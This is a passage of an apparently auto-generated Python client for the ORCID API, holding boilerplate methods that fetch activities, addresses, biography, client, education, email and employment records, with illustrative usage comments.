_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
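# Usage sketch (illustrative, not part of the generated client): a
# synchronous work update. `api` is assumed to be an instance of this
# API class; the ORCID iD, put code and Work payload are placeholders.
# >>> body = Work(...)  # hypothetical Work payload
# >>> api.update_work_json('0000-0002-1825-0097', '123456', body=body)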
def view_activities(self, orcid, **kwargs):
"""
Fetch all activities
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_activities(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: ActivitiesSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_activities_with_http_info(orcid, **kwargs)
else:
data = self.view_activities_with_http_info(orcid, **kwargs)
return data
def view_activities_with_http_info(self, orcid, **kwargs):
"""
Fetch all activities
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_activities_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: ActivitiesSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_activities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_activities`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/activities'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivitiesSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
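# Usage sketch (illustrative): fetching the activities summary. `api`
# is assumed to be an instance of this API class; the iD is a
# placeholder. A plain call blocks and returns a deserialised
# ActivitiesSummary, while passing `callback` returns the request
# thread and delivers the response to the callback instead:
# >>> summary = api.view_activities('0000-0002-1825-0097')
# >>> thread = api.view_activities('0000-0002-1825-0097',
# ...                              callback=my_callback)  # my_callback: hypothetical handler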
def view_address(self, orcid, put_code, **kwargs):
"""
Fetch an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_address(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_address_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_address_with_http_info(orcid, put_code, **kwargs)
return data
def view_address_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_address_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_address`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_address`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
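# Note: view_address and view_addresses pass response_type=None, so the
# deserialised return value is None even on success; unlike most other
# view_* methods here, they also set no explicit Accept header, leaving
# content negotiation to the client and server defaults.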
def view_addresses(self, orcid, **kwargs):
"""
Fetch all addresses of a profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_addresses(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_addresses_with_http_info(orcid, **kwargs)
else:
data = self.view_addresses_with_http_info(orcid, **kwargs)
return data
def view_addresses_with_http_info(self, orcid, **kwargs):
"""
Fetch all addresses of a profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_addresses_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_addresses" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_addresses`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_biography(self, orcid, **kwargs):
"""
Get biography details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_biography(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_biography_with_http_info(orcid, **kwargs)
else:
data = self.view_biography_with_http_info(orcid, **kwargs)
return data
def view_biography_with_http_info(self, orcid, **kwargs):
"""
Get biography details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_biography_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_biography" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_biography`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/biography'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
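# The Accept list above offers the ORCID vendor media types alongside
# plain XML/JSON; the qs values appear to be quality-of-source weights
# carried over from the server's content-negotiation settings, and
# select_header_accept collapses the list into a single Accept header.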
def view_client(self, client_id, **kwargs):
"""
Fetch client details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_client(client_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_client_with_http_info(client_id, **kwargs)
else:
data = self.view_client_with_http_info(client_id, **kwargs)
return data
def view_client_with_http_info(self, client_id, **kwargs):
"""
Fetch client details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_client_with_http_info(client_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params) or (params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `view_client`")
if 'client_id' in params and not re.search('[^/]+', params['client_id']):
raise ValueError("Invalid value for parameter `client_id` when calling `view_client`, must conform to the pattern `/[^/]+/`")
collection_formats = {}
resource_path = '/v3.0_dev1/client/{client_id}'.replace('{format}', 'json')
path_params = {}
if 'client_id' in params:
path_params['client_id'] = params['client_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
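# Usage sketch (illustrative): `api` is assumed to be an instance of
# this API class and the client id is a hypothetical placeholder. Note
# that client_id is pre-validated against the pattern `[^/]+` and that
# response_type=None means no deserialised body is returned:
# >>> api.view_client('APP-0000000000000000')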
def view_education(self, orcid, put_code, **kwargs):
"""
Fetch an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Education
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_education_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_education_with_http_info(orcid, put_code, **kwargs)
return data
def view_education_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Education
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_education" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_education`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_education`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Education',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
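# Usage sketch (illustrative): the required-parameter checks raise
# ValueError locally, before any HTTP request is made. `api` is assumed
# to be an instance of this API class.
# >>> try:
# ...     api.view_education('0000-0002-1825-0097', None)
# ... except ValueError as exc:
# ...     print(exc)  # Missing the required parameter `put_code` ...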
def view_education_summary(self, orcid, put_code, **kwargs):
"""
Fetch an Education summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EducationSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_education_summary_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_education_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_education_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Education summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EducationSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_education_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_education_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_education_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EducationSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_educations(self, orcid, **kwargs):
"""
Fetch all educations
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_educations(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Educations
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_educations_with_http_info(orcid, **kwargs)
else:
data = self.view_educations_with_http_info(orcid, **kwargs)
return data
def view_educations_with_http_info(self, orcid, **kwargs):
"""
Fetch all educations
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_educations_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Educations
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_educations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_educations`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/educations'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Educations',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_emails(self, orcid, **kwargs):
"""
Fetch all emails for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_emails(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_emails_with_http_info(orcid, **kwargs)
else:
data = self.view_emails_with_http_info(orcid, **kwargs)
return data
def view_emails_with_http_info(self, orcid, **kwargs):
"""
Fetch all emails for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_emails_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_emails" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_emails`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/email'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_employment(self, orcid, put_code, **kwargs):
"""
Fetch an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Employment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_employment_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_employment_with_http_info(orcid, put_code, **kwargs)
return data
def view_employment_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Employment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_employment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_employment`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_employment`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Employment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
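# Note: the public view_employment forces _return_http_data_only=True
# and returns just the deserialised Employment; calling
# view_employment_with_http_info directly without that flag returns the
# fuller call_api result (in swagger-generated clients, typically a
# (data, status_code, headers) tuple).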
def view_employment_summary(self, orcid, put_code, **kwargs):
"""
Fetch an Employment Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EmploymentSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_employment_summary_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_employment_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_employment_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Employment Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EmploymentSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_employment_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_employment_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_employment_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmploymentSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_employments(self, orcid, **kwargs):
"""
Fetch all employments
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employments(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Employments
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_employments_with_http_info(orcid, **kwargs)
else:
data = self.view_employments_with_http_info(orcid, **kwargs)
return data
def view_employments_with_http_info(self, orcid, **kwargs):
"""
Fetch all employments
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employments_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Employments
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
